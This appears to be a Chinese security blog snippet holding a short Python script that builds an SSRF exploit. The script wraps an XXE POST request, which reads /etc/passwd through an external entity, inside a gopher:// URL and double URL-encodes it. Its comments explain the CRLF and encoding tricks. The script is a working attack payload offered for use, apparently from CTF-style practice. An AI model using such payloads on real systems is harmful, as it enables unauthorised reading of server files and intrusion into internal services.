2024-07-06 2026-01-25 123456789101112131415161718192021222324import urllib.parsepayload =\"""POST /xxe.php HTTP/1.1Host: 127.0.0.1Connection: closeContent-Length: 163<?xml version="1.0" ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY sp SYSTEM "file:///etc/passwd">]><root><name>&sp;</name><password>hj</password></root>""" #注意后面一定要有回车,回车结尾表示http请求结束tmp = urllib.parse.quote(payload)new = tmp.replace('%0A','%0D%0A')result = 'gopher://127.0.0.1:80/'+'_'+newresult = urllib.parse.quote(result)print(result) # 这里因为是GET请求所以要进行两次url编码 前一篇 安卓微信8.0之后如何利用缓存找回的三天之前不可见的朋友圈图片 后一篇 python 多线程条件竞争利用失败print不显示的原因
说些什么吧!